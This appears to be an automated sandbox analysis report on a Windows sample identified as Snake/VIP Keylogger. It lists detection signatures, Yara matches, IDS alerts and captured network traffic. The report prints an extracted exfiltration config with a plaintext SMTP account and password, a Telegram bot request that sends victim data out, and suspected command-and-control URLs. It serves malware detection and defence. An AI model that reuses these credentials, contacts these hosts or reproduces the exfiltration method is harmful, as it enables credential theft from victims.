Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1582677
MD5: 3b2a532f5145a1e1a1d04daf8119caf1
SHA1: 850db92a1aea8c8a7ba5a940c9f9ab19c31ce9a4
SHA256: 49039b4b47513f22a7e396b57a73abe02b0032a09089e8fa68c94c0eae655d6b
Tags: exe, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B2A532F5145A1E1A1D04DAF8119CAF1)
    • file.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B2A532F5145A1E1A1D04DAF8119CAF1)
    • WerFault.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2d703:$a1: get_encryptedPassword
  • 0x2da20:$a2: get_encryptedUsername
  • 0x2d513:$a3: get_timePasswordChanged
  • 0x2d61c:$a4: get_passwordField
  • 0x2d719:$a5: set_encryptedPassword
  • 0x2edda:$a7: get_logins
  • 0x2ed3d:$a10: KeyLoggerEventArgs
  • 0x2e9a2:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(14 entries in total; list truncated)
Source | Rule | Description | Author | Strings
0.2.file.exe.3c2d060.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.file.exe.3c2d060.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
0.2.file.exe.3c2d060.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.file.exe.3c2d060.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2bb03:$a1: get_encryptedPassword
  • 0x2be20:$a2: get_encryptedUsername
  • 0x2b913:$a3: get_timePasswordChanged
  • 0x2ba1c:$a4: get_passwordField
  • 0x2bb19:$a5: set_encryptedPassword
  • 0x2d1da:$a7: get_logins
  • 0x2d13d:$a10: KeyLoggerEventArgs
  • 0x2cda2:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.3c2d060.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x397c2:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38e65:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x390c2:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39aa1:$a5: \Kometa\User Data\Default\Login Data
(27 entries in total; list truncated)
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T09:15:22.240634+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 188.114.96.3 | 443 | TCP
2024-12-31T09:15:24.740290+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | TCP
2024-12-31T09:15:28.946869+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
2024-12-31T09:15:31.946675+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T09:15:17.975351+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
2024-12-31T09:15:21.694106+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | TCP
2024-12-31T09:15:24.194291+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49750 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T09:15:36.900479+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | TCP

                AV Detection

Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
Source: 2.2.file.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
Source: file.exe | Virustotal: Detection: 42%
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Accessibility.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Drawing.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdbC source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdb source: WERB432.tmp.dmp.5.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 0158F45Dh | 2_2_0158F2C0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 0158F45Dh | 2_2_0158F52F
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 0158F45Dh | 2_2_0158F4AC
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 0158FC19h | 2_2_0158F961

                Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49764 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 08:15:36 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
Source: file.exe, 00000002.00000002.4144889269.0000000003253000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: file.exe, 00000002.00000002.4144889269.000000000324E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000002.00000002.4144889269.0000000003284000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: file.exe, 00000002.00000002.4144889269.000000000327F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

                System Summary

